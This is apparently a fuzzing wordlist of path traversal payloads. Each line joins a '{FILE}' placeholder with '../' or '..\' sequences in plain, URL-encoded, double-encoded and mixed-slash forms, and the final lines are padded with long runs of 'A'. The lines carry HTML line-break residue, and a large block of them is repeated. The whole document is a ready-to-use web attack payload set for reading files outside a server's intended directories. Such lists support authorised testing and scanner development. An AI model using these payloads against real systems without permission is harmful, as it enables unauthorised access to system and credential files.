%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
